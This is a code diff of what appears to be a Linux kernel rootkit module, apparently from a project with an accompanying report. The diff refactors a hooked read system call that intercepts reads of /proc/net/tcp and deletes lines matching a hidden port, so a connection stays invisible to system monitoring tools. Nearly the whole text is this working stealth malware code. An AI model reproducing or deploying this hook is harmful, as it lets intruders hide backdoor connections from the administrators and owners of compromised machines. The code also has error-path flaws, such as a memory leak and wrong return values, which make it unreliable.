|
|
|
|
@ -23,6 +23,11 @@
|
|
|
|
|
*******************************************************************************/
|
|
|
|
|
#include "h1d3p0r7.h"
|
|
|
|
|
|
|
|
|
|
/**** var **********************************************************************
|
|
|
|
|
*******************************************************************************/
|
|
|
|
|
|
|
|
|
|
sys_read_ptr sys_read_orig;
|
|
|
|
|
|
|
|
|
|
/*******************************************************************************/
|
|
|
|
|
|
|
|
|
|
/*** FUNCTION ****************************************************************
|
|
|
|
|
@ -32,8 +37,8 @@
|
|
|
|
|
* RETURNS:
|
|
|
|
|
*******************************************************************************/
|
|
|
|
|
|
|
|
|
|
asmlinkage long hacked_read(unsigned int fd, char __user *buf,
|
|
|
|
|
size_t count)
|
|
|
|
|
asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
|
|
|
|
|
size_t count)
|
|
|
|
|
{
|
|
|
|
|
long result, bp, diff_in_bytes;
|
|
|
|
|
char *kbuf, *start_line, *end_line, *port_num;
|
|
|
|
|
@ -43,47 +48,59 @@ asmlinkage long hacked_read(unsigned int fd, char __user *buf,
|
|
|
|
|
struct path file_path;
|
|
|
|
|
|
|
|
|
|
// run real read
|
|
|
|
|
result = (*orig_read)(fd,buf,count);
|
|
|
|
|
if (result <= 0)
|
|
|
|
|
result = (*sys_read_orig)(fd, buf, count);
|
|
|
|
|
|
|
|
|
|
if (result <= 0){
|
|
|
|
|
return result;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
// get pathname
|
|
|
|
|
// CITATION [8] from report
|
|
|
|
|
current_files = current->files;
|
|
|
|
|
files_table = files_fdtable(current_files);
|
|
|
|
|
|
|
|
|
|
file_path = files_table->fd[fd]->f_path;
|
|
|
|
|
pathname = d_path(&file_path,pbuf,256*sizeof(char));
|
|
|
|
|
// if virtual file /proc/net/tcp
|
|
|
|
|
if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
|
|
|
|
|
// copy from user to kernelspace;
|
|
|
|
|
if (!access_ok(VERIFY_READ,buf,result))
|
|
|
|
|
pathname = d_path(&file_path, pbuf, 256*sizeof(char));
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) {
|
|
|
|
|
|
|
|
|
|
if (!access_ok(VERIFY_READ, buf, result)){
|
|
|
|
|
return -1;
|
|
|
|
|
if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
|
|
|
|
|
}
|
|
|
|
|
if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){
|
|
|
|
|
return -1;
|
|
|
|
|
if (copy_from_user(kbuf,buf,result))
|
|
|
|
|
}
|
|
|
|
|
if (copy_from_user(kbuf, buf, result)){
|
|
|
|
|
return -1;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
// filter out hidden ports
|
|
|
|
|
start_line = strchr(kbuf,':') - 4; // skip first line
|
|
|
|
|
start_line = strchr(kbuf, ':') - 4;
|
|
|
|
|
diff_in_bytes = (start_line - kbuf) * sizeof(char);
|
|
|
|
|
|
|
|
|
|
for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
|
|
|
|
|
|
|
|
|
|
start_line = kbuf + bp;
|
|
|
|
|
port_num = strchr(strchr(start_line,':') + 1,':') + 1;
|
|
|
|
|
end_line = strchr(start_line,'\n');
|
|
|
|
|
port_num = strchr(strchr(start_line, ':') + 1, ':') + 1;
|
|
|
|
|
end_line = strchr(start_line, '\n');
|
|
|
|
|
diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
|
|
|
|
|
if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
|
|
|
|
|
memmove(start_line,end_line + 1, // delete line in file
|
|
|
|
|
result - bp - diff_in_bytes);
|
|
|
|
|
|
|
|
|
|
if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) {
|
|
|
|
|
|
|
|
|
|
memmove(start_line, end_line + 1,
|
|
|
|
|
result - bp - diff_in_bytes);
|
|
|
|
|
|
|
|
|
|
result -= diff_in_bytes;
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
// copy from kernel to userspace
|
|
|
|
|
if (!access_ok(VERIFY_WRITE,buf,result))
|
|
|
|
|
if (!access_ok(VERIFY_WRITE, buf, result)){
|
|
|
|
|
return EINVAL;
|
|
|
|
|
if (copy_to_user(buf,kbuf,result))
|
|
|
|
|
}
|
|
|
|
|
if (copy_to_user(buf, kbuf, result)){
|
|
|
|
|
return EINVAL;
|
|
|
|
|
}
|
|
|
|
|
kfree(kbuf);
|
|
|
|
|
}
|
|
|
|
|
// return number of bytes read
|
|
|
|
|
|
